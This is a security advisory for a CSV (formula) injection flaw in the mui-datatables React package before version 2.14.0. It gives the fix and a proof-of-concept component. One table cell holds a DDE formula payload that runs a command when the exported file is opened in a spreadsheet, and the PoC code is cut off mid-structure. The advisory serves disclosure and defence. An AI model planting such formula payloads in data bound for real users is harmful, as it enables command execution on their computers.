CSV Injection Affecting mui-datatables package, versions <2.14.0



    Attack Complexity Low
    User Interaction Required

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications
  • published 14 Apr 2019
  • disclosed 29 Mar 2019
  • credit gregnb

Introduced: 29 Mar 2019

CVE NOT AVAILABLE CWE-74 Open this link in a new tab

How to fix?

Upgrade mui-datatables to version 2.14.0 or higher.


mui-datatables is a data tables component built on Material-UI.

Affected versions of this package are vulnerable to CSV Injection. CSV Injection, also known as Formula Injection, occurs when websites embed untrusted input inside CSV files. When a spreadsheet program is used to open a CSV, any cells starting with '=' will be interpreted by the software as a formula. Maliciously crafted formulas can be used for three key attacks:

  • Hijacking the user's computer by exploiting vulnerabilities in the spreadsheet software.
  • Hijacking the user's computer by exploiting the user's tendency to ignore security warnings in spreadsheets that they downloaded from their own website
  • Exfiltrating contents from the spreadsheet, or other open spreadsheets.

Proof Of Concept (PoC)

import React from "react";
import ReactDOM from "react-dom";
import MUIDataTable from "mui-datatables";

class App extends React.Component {
  render() {
    const columns = ["Name", "Title", "Location", "Age", "Salary"];

    const data = [
      ["=cmd|' /C calc'!A0", "Business Analyst", "Minneapolis", 30, "$100,000"],
      ["Aiden Lloyd", "Business Consultant", "Dallas", 55, "$200,000"],
      ["Jaden Collins", "Attorney", "Santa Ana", 27, "$500,000"]
    const options = {
      filterType: "dropdown",
      responsive: "scroll"
    return (
        title={"ACME Employee list"}
ReactDOM.render(<App />, document.getElementById("root"));